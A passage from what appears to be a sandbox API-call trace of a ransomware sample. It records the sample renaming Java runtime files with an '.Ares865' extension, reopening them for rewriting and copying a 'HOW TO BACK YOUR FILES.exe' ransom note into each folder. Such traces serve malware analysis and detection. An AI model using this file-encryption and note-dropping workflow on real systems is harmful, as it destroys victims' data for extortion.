(lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunmscapi.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunmscapi.jar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunmscapi.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunmscapi.jar.ares865"), dwFlags=0x1) returned 1 [0137.194] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunmscapi.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunmscapi.jar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.194] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=30695) returned 1 [0137.198] lstrcpyW (in: lpString1=0x2cce452, lpString2="sunpkcs11.jar" | out: lpString1="sunpkcs11.jar") returned="sunpkcs11.jar" [0137.198] lstrlenW (lpString="sunpkcs11.jar") returned 13 [0137.198] lstrlenW (lpString="Ares865") returned 7 [0137.198] lstrcmpiW (lpString1="s11.jar", lpString2="Ares865") returned 1 [0137.198] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunpkcs11.jar.Ares865") returned 62 [0137.198] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunpkcs11.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunpkcs11.jar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunpkcs11.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunpkcs11.jar.ares865"), dwFlags=0x1) returned 1 [0137.201] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunpkcs11.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunpkcs11.jar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.201] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=237526) returned 1 [0137.217] lstrcpyW (in: lpString1=0x2cce452, lpString2="zipfs.jar" | out: lpString1="zipfs.jar") returned="zipfs.jar" [0137.217] lstrlenW (lpString="zipfs.jar") returned 9 [0137.217] lstrlenW (lpString="Ares865") returned 7 [0137.217] lstrcmpiW (lpString1="pfs.jar", lpString2="Ares865") returned 1 [0137.217] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\zipfs.jar.Ares865") returned 58 [0137.217] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\zipfs.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\zipfs.jar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\zipfs.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\zipfs.jar.ares865"), dwFlags=0x1) returned 1 [0137.219] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\zipfs.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\zipfs.jar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.219] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=68762) returned 1 [0137.226] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy" [0137.226] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy" [0137.226] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0137.226] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\how to back your files.exe"), bFailIfExists=1) returned 0 [0137.227] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0137.227] GetLastError () returned 0x0 [0137.228] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0137.228] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74470c60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x5319fb20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5319fb20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0137.228] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0137.228] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0137.228] lstrcpyW (in: lpString1=0x2cce458, lpString2="ffjcext.zip.Ares865" | out: lpString1="ffjcext.zip.Ares865") returned="ffjcext.zip.Ares865" [0137.228] lstrlenW (lpString="ffjcext.zip.Ares865") returned 19 [0137.228] lstrlenW (lpString="Ares865") returned 7 [0137.228] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0137.228] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5319fb20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5319fb20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0137.228] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0137.228] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74470c60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x531c5c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x531c5c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jqs", cAlternateFileName="")) returned 1 [0137.228] lstrcmpiW (lpString1="jqs", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0137.228] lstrcmpiW (lpString1="jqs", lpString2="aoldtz.exe") returned 1 [0137.229] lstrcpyW (in: lpString1=0x2cce458, lpString2="jqs" | out: lpString1="jqs") returned="jqs" [0137.229] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0137.229] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x60) returned 0x2f1fc8 [0137.229] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0137.229] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74470c60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x74470c60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x74470c60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xb2c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="messages.properties", cAlternateFileName="MESSAG~1.PRO")) returned 1 [0137.229] lstrcmpiW (lpString1="messages.properties", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0137.229] lstrcmpiW (lpString1="messages.properties", lpString2="aoldtz.exe") returned 1 [0137.229] lstrcpyW (in: lpString1=0x2cce458, lpString2="messages.properties" | out: lpString1="messages.properties") returned="messages.properties" [0137.229] lstrlenW (lpString="messages.properties") returned 19 [0137.229] lstrlenW (lpString="Ares865") returned 7 [0137.229] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0137.229] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages.properties.Ares865") returned 71 [0137.229] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages.properties"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages.properties.ares865"), dwFlags=0x1) returned 1 [0137.231] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages.properties.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.232] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2860) returned 1 [0137.236] lstrcpyW (in: lpString1=0x2cce458, lpString2="messages_de.properties" | out: lpString1="messages_de.properties") returned="messages_de.properties" [0137.236] lstrlenW (lpString="messages_de.properties") returned 22 [0137.236] lstrlenW (lpString="Ares865") returned 7 [0137.236] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0137.237] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_de.properties.Ares865") returned 74 [0137.237] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_de.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_de.properties"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_de.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_de.properties.ares865"), dwFlags=0x1) returned 1 [0137.239] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_de.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_de.properties.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.239] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3306) returned 1 [0137.242] lstrcpyW (in: lpString1=0x2cce458, lpString2="messages_es.properties" | out: lpString1="messages_es.properties") returned="messages_es.properties" [0137.242] lstrlenW (lpString="messages_es.properties") returned 22 [0137.242] lstrlenW (lpString="Ares865") returned 7 [0137.242] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0137.243] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_es.properties.Ares865") returned 74 [0137.243] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_es.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_es.properties"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_es.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_es.properties.ares865"), dwFlags=0x1) returned 1 [0137.247] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_es.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_es.properties.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.247] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3600) returned 1 [0137.250] lstrcpyW (in: lpString1=0x2cce458, lpString2="messages_fr.properties" | out: lpString1="messages_fr.properties") returned="messages_fr.properties" [0137.250] lstrlenW (lpString="messages_fr.properties") returned 22 [0137.250] lstrlenW (lpString="Ares865") returned 7 [0137.250] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0137.250] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_fr.properties.Ares865") returned 74 [0137.251] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_fr.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_fr.properties"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_fr.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_fr.properties.ares865"), dwFlags=0x1) returned 1 [0137.256] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_fr.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_fr.properties.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.257] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3409) returned 1 [0137.262] lstrcpyW (in: lpString1=0x2cce458, lpString2="messages_it.properties" | out: lpString1="messages_it.properties") returned="messages_it.properties" [0137.262] lstrlenW (lpString="messages_it.properties") returned 22 [0137.262] lstrlenW (lpString="Ares865") returned 7 [0137.262] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0137.262] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_it.properties.Ares865") returned 74 [0137.262] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_it.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_it.properties"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_it.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_it.properties.ares865"), dwFlags=0x1) returned 1 [0137.271] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_it.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_it.properties.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.271] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3223) returned 1 [0137.279] lstrcpyW (in: lpString1=0x2cce458, lpString2="messages_ja.properties" | out: lpString1="messages_ja.properties") returned="messages_ja.properties" [0137.279] lstrlenW (lpString="messages_ja.properties") returned 22 [0137.279] lstrlenW (lpString="Ares865") returned 7 [0137.279] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0137.280] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_ja.properties.Ares865") returned 74 [0137.280] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_ja.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_ja.properties"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_ja.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_ja.properties.ares865"), dwFlags=0x1) returned 1 [0137.282] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_ja.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_ja.properties.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.282] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6349) returned 1 [0137.285] lstrcpyW (in: lpString1=0x2cce458, lpString2="messages_ko.properties" | out: lpString1="messages_ko.properties") returned="messages_ko.properties" [0137.285] lstrlenW (lpString="messages_ko.properties") returned 22 [0137.286] lstrlenW (lpString="Ares865") returned 7 [0137.286] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0137.286] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_ko.properties.Ares865") returned 74 [0137.286] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_ko.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_ko.properties"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_ko.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_ko.properties.ares865"), dwFlags=0x1) returned 1 [0137.288] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_ko.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_ko.properties.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.288] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5719) returned 1 [0137.296] lstrcpyW (in: lpString1=0x2cce458, lpString2="messages_pt_BR.properties" | out: lpString1="messages_pt_BR.properties") returned="messages_pt_BR.properties" [0137.296] lstrlenW (lpString="messages_pt_BR.properties") returned 25 [0137.296] lstrlenW (lpString="Ares865") returned 7 [0137.296] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0137.297] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_pt_BR.properties.Ares865") returned 77 [0137.297] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_pt_BR.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_pt_br.properties"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_pt_BR.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_pt_br.properties.ares865"), dwFlags=0x1) returned 1 [0137.298] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_pt_BR.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_pt_br.properties.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.298] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3348) returned 1 [0137.301] lstrcpyW (in: lpString1=0x2cce458, lpString2="messages_sv.properties" | out: lpString1="messages_sv.properties") returned="messages_sv.properties" [0137.301] lstrlenW (lpString="messages_sv.properties") returned 22 [0137.301] lstrlenW (lpString="Ares865") returned 7 [0137.301] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0137.302] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_sv.properties.Ares865") returned 74 [0137.302] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_sv.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_sv.properties"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_sv.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_sv.properties.ares865"), dwFlags=0x1) returned 1 [0137.303] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_sv.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_sv.properties.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.304] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3409) returned 1 [0137.307] lstrcpyW (in: lpString1=0x2cce458, lpString2="messages_zh_CN.properties" | out: lpString1="messages_zh_CN.properties") returned="messages_zh_CN.properties" [0137.307] lstrlenW (lpString="messages_zh_CN.properties") returned 25 [0137.307] lstrlenW (lpString="Ares865") returned 7 [0137.307] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0137.307] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_CN.properties.Ares865") returned 77 [0137.307] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_CN.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_cn.properties"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_CN.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_cn.properties.ares865"), dwFlags=0x1) returned 1 [0137.309] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_CN.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_cn.properties.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.309] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4072) returned 1 [0137.312] lstrcpyW (in: lpString1=0x2cce458, lpString2="messages_zh_HK.properties" | out: lpString1="messages_zh_HK.properties") returned="messages_zh_HK.properties" [0137.312] lstrlenW (lpString="messages_zh_HK.properties") returned 25 [0137.312] lstrlenW (lpString="Ares865") returned 7 [0137.312] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0137.312] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_HK.properties.Ares865") returned 77 [0137.312] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_HK.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_hk.properties"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_HK.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_hk.properties.ares865"), dwFlags=0x1) returned 1 [0137.314] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_HK.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_hk.properties.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.314] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3752) returned 1 [0137.317] lstrcpyW (in: lpString1=0x2cce458, lpString2="messages_zh_TW.properties" | out: lpString1="messages_zh_TW.properties") returned="messages_zh_TW.properties" [0137.317] lstrlenW (lpString="messages_zh_TW.properties") returned 25 [0137.318] lstrlenW (lpString="Ares865") returned 7 [0137.318] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0137.318] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_TW.properties.Ares865") returned 77 [0137.318] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_TW.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_tw.properties"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_TW.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_tw.properties.ares865"), dwFlags=0x1) returned 1 [0137.320] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_TW.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_tw.properties.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.321] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3752) returned 1 [0137.325] lstrcpyW (in: lpString1=0x2cce458, lpString2="splash.gif" | out: lpString1="splash.gif") returned="splash.gif" [0137.325] lstrlenW (lpString="splash.gif") returned 10 [0137.325] lstrlenW (lpString="Ares865") returned 7 [0137.325] lstrcmpiW (lpString1="ash.gif", lpString2="Ares865") returned 1 [0137.326] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\splash.gif.Ares865") returned 62 [0137.326] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\splash.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\splash.gif"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\splash.gif.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\splash.gif.ares865"), dwFlags=0x1) returned 1 [0137.328] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\splash.gif.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\splash.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.328] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13959) returned 1 [0137.332] lstrcpynW (in: lpString1=0x2cce400, 